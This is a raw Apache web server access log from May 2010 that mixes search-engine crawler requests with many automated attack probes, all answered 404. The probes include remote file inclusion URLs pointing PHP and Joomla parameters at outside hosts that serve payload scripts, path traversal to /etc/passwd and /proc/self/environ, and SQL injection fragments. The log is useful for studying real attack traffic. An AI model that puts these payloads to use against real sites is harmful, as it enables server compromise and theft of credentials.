207.46.199.48 - - [19/May/2010:19:03:05 -0500] "GET /logs/access_log.1220313600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:19:05:15 -0500] "GET /logs/access_log.1157414400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [19/May/2010:19:09:33 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:19:09:50 -0500] "GET /logs/access_log.1167004800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [19/May/2010:19:10:04 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:19:10:04 -0500] "GET /logs/access_log.1272844800%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
70.188.12.135 - - [19/May/2010:19:12:58 -0500] "GET /logs/access_log.1203379200 HTTP/1.1" 404 310 "http://www.google.com/search?q=38.105.65.99&hl=en&rlz=1B3GGGL_enUS327US327&start=10&sa=N""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 (.NET CLR 3.5.30729)"
70.188.12.135 - - [19/May/2010:19:12:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 (.NET CLR 3.5.30729)"
87.250.255.243 - - [19/May/2010:19:16:31 -0500] "GET /logs/access_log.1200268800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
80.67.23.184 - - [19/May/2010:19:17:08 -0500] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 344 "-""libwww-perl/5.808"
80.67.23.184 - - [19/May/2010:19:17:08 -0500] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 349 "-""libwww-perl/5.808"
216.14.124.80 - - [19/May/2010:19:18:38 -0500] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
211.239.161.143 - - [19/May/2010:19:19:21 -0500] "GET /path_of_cpcommerce/_functions.php?prefix=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
211.239.161.143 - - [19/May/2010:19:19:22 -0500] "GET /logs/path_of_cpcommerce/_functions.php?prefix=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
87.250.255.243 - - [19/May/2010:19:22:00 -0500] "GET /costume/links.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
211.239.161.143 - - [19/May/2010:19:22:24 -0500] "GET /path_of_cpcommerce/_functions.php?prefix=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
211.239.161.143 - - [19/May/2010:19:22:24 -0500] "GET /logs/path_of_cpcommerce/_functions.php?prefix=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
67.195.112.180 - - [19/May/2010:19:25:42 -0500] "GET /logs/access_log.1238716800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [19/May/2010:19:27:29 -0500] "GET /logs/access_log.1164758400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
183.80.125.164 - - [19/May/2010:19:28:01 -0500] "GET /logs/access_log.1263340800+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
183.80.125.164 - - [19/May/2010:19:28:21 -0500] "GET /logs/access_log.1266278400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
87.250.255.243 - - [19/May/2010:19:34:09 -0500] "GET /logs/access_log.1163548800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [19/May/2010:19:35:15 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [19/May/2010:19:35:15 -0500] "GET /logs/access_log.1213488000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
183.80.125.164 - - [19/May/2010:19:36:05 -0500] "GET /logs/access_log.1263340800+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
183.80.125.164 - - [19/May/2010:19:36:24 -0500] "GET /logs/access_log.1266278400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
174.121.158.8 - - [19/May/2010:19:37:44 -0500] "GET /logs/index.php?option=com_datafeeds&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
174.121.158.8 - - [19/May/2010:19:37:44 -0500] "GET /index.php?option=com_datafeeds&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
174.121.158.8 - - [19/May/2010:19:37:44 -0500] "GET /index.php?option=com_datafeeds&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
174.121.158.8 - - [19/May/2010:19:37:44 -0500] "GET /logs/index.php?option=com_datafeeds&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
87.250.255.243 - - [19/May/2010:19:37:49 -0500] "GET /logs/access_log.1218326400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.14.124.80 - - [19/May/2010:19:39:49 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
216.14.124.80 - - [19/May/2010:19:39:49 -0500] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
216.14.124.80 - - [19/May/2010:19:39:49 -0500] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
183.80.125.164 - - [19/May/2010:19:43:47 -0500] "GET /logs/access_log.1263340800+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
183.80.125.164 - - [19/May/2010:19:44:05 -0500] "GET /logs/access_log.1266278400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
87.250.255.243 - - [19/May/2010:19:44:13 -0500] "GET /logs/access_log.1181865600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
183.80.125.164 - - [19/May/2010:19:45:55 -0500] "GET /logs/access_log.1263340800+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
183.80.125.164 - - [19/May/2010:19:46:15 -0500] "GET /logs/access_log.1266278400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
87.250.255.243 - - [19/May/2010:19:47:53 -0500] "GET /costume/thmb4.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.186 - - [19/May/2010:19:51:05 -0500] "GET /logs/access_log.1179705600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.233 - - [19/May/2010:19:53:04 -0500] "GET /logs/access_log.1267660800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
183.80.125.164 - - [19/May/2010:19:54:31 -0500] "GET /logs/access_log.1263340800+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
87.250.255.243 - - [19/May/2010:19:54:34 -0500] "GET /logs/access_log.1208217600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
183.80.125.164 - - [19/May/2010:19:54:51 -0500] "GET /logs/access_log.1266278400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
74.55.52.154 - - [19/May/2010:19:55:49 -0500] "GET //errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
74.55.52.154 - - [19/May/2010:19:55:49 -0500] "GET /logs//errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:19:59:08 -0500] "GET /logs/access_log.1236902400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
183.80.125.164 - - [19/May/2010:19:59:21 -0500] "GET /logs/access_log.1264982400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
183.80.125.164 - - [19/May/2010:19:59:42 -0500] "GET /logs/access_log.1263340800+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
183.80.125.164 - - [19/May/2010:19:59:58 -0500] "GET /logs/access_log.1266278400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
80.67.23.184 - - [19/May/2010:20:00:40 -0500] "GET /logs/access_log.1271894400//errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
80.67.23.184 - - [19/May/2010:20:00:40 -0500] "GET /logs//errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
80.67.23.184 - - [19/May/2010:20:00:40 -0500] "GET //errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
183.80.125.164 - - [19/May/2010:20:02:19 -0500] "GET /logs/access_log.1264982400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
183.80.125.164 - - [19/May/2010:20:02:41 -0500] "GET /logs/access_log.1263340800+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
183.80.125.164 - - [19/May/2010:20:03:02 -0500] "GET /logs/access_log.1266278400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
87.250.255.243 - - [19/May/2010:20:04:37 -0500] "GET /logs/access_log.1161820800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.80.122.44 - - [19/May/2010:20:06:08 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:20:07:22 -0500] "GET /logs/access_log.1159142400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.177.125 - - [19/May/2010:20:07:51 -0500] "GET //board///index.php/connect.lib.php?g4[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
114.108.177.125 - - [19/May/2010:20:07:51 -0500] "GET /logs//board///index.php/connect.lib.php?g4[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.108.177.125 - - [19/May/2010:20:07:52 -0500] "GET /logs/access_log.1271548800//board///index.php/connect.lib.php?g4[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
74.55.52.154 - - [19/May/2010:20:10:30 -0500] "GET /modules/tasks/viewgantt.php?root_dir=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
74.55.52.154 - - [19/May/2010:20:10:30 -0500] "GET /logs/modules/tasks/viewgantt.php?root_dir=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:20:11:58 -0500] "GET /logs/access_log.1270252800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [19/May/2010:20:12:33 -0500] "GET /logs/access_log.1232841600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.108.177.125 - - [19/May/2010:20:14:36 -0500] "GET /logs/access_log.1264032000//board///index.php/connect.lib.php?g4[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.195.112.180 - - [19/May/2010:20:14:40 -0500] "GET /logs/access_log.1211068800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [19/May/2010:20:17:28 -0500] "GET /logs/access_log.1200700800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.177.125 - - [19/May/2010:20:17:28 -0500] "GET /logs//board///index.php/connect.lib.php?g4[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.108.177.125 - - [19/May/2010:20:17:29 -0500] "GET /logs/access_log.1271548800//board///index.php/connect.lib.php?g4[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
114.108.177.125 - - [19/May/2010:20:17:29 -0500] "GET //board///index.php/connect.lib.php?g4[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
208.115.111.248 - - [19/May/2010:20:21:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [19/May/2010:20:22:59 -0500] "GET /logs/access_log.1168473600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.177.125 - - [19/May/2010:20:25:29 -0500] "GET /logs/access_log.1264032000//board///index.php/connect.lib.php?g4[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
119.63.193.56 - - [19/May/2010:20:28:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
87.250.255.243 - - [19/May/2010:20:28:29 -0500] "GET /logs/access_log.1208390400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/May/2010:20:33:59 -0500] "GET /logs/access_log.1212710400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.185 - - [19/May/2010:20:34:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.69.115.198 - - [19/May/2010:20:36:52 -0500] "GET /logs/access_log.1263081600//index.php?option=com_lmo&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:36:52 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:36:53 -0500] "GET /logs/access_log.1264204800//index.php?option=com_lmo&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:36:53 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:36:53 -0500] "GET /logs/access_log.1262822400//index.php?option=com_lmo&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:36:53 -0500] "GET /logs/access_log.1264032000//index.php?option=com_lmo&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:37:00 -0500] "GET /logs/access_log.1265414400//index.php?option=com_lmo&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:37:01 -0500] "GET /logs/access_log.1271116800//index.php?option=com_lmo&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:37:02 -0500] "GET /logs/access_log.1262649600//index.php?option=com_lmo&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:37:02 -0500] "GET /logs/access_log.1271548800//index.php?option=com_lmo&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:37:04 -0500] "GET /logs/access_log.1266192000//index.php?option=com_lmo&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:20:38:34 -0500] "GET /logs/access_log.1215993600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
80.65.166.74 - - [19/May/2010:20:39:02 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:39:02 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:39:02 -0500] "GET /logs/access_log.1271548800//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:39:59 -0500] "GET /logs/access_log.1264118400//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:00 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:00 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:00 -0500] "GET /logs/access_log.1263081600//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:00 -0500] "GET /logs/access_log.1264032000//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:00 -0500] "GET /logs/access_log.1265587200//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:00 -0500] "GET /logs/access_log.1262822400//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:03 -0500] "GET /logs/access_log.1266451200//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:24 -0500] "GET /logs/access_log.1265414400//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:24 -0500] "GET /logs/access_log.1262649600//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:24 -0500] "GET /logs/access_log.1270512000//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:24 -0500] "GET /logs/access_log.1271116800//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:24 -0500] "GET /logs/access_log.1271548800//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:20:40:24 -0500] "GET /logs/access_log.1262563200//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:40:45 -0500] "GET /logs/access_log.1264118400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:40:45 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:40:46 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:40:52 -0500] "GET /logs/access_log.1263427200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:40:53 -0500] "GET /logs/access_log.1262649600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:40:53 -0500] "GET /logs/access_log.1265414400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:40:53 -0500] "GET /logs/access_log.1264204800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:40:53 -0500] "GET /logs/access_log.1266451200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:40:53 -0500] "GET /logs/access_log.1264032000//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
83.69.115.198 - - [19/May/2010:20:40:54 -0500] "GET /logs/access_log.1272585600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.67.23.184 - - [19/May/2010:20:41:19 -0500] "GET /logs//errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
80.67.23.184 - - [19/May/2010:20:41:19 -0500] "GET //errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
121.88.4.141 - - [19/May/2010:20:42:40 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
80.65.166.74 - - [19/May/2010:20:42:51 -0500] "GET /logs/access_log.1272844800//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.195.112.180 - - [19/May/2010:20:43:57 -0500] "GET /logs/access_log.1182384000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [19/May/2010:20:44:04 -0500] "GET /logs/access_log.1267056000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
83.69.115.198 - - [19/May/2010:20:45:17 -0500] "GET /logs/access_log.1262822400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:20:47:11 -0500] "GET /logs/access_log.1273276800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
121.88.4.141 - - [19/May/2010:20:47:12 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.88.4.141 - - [19/May/2010:20:47:12 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
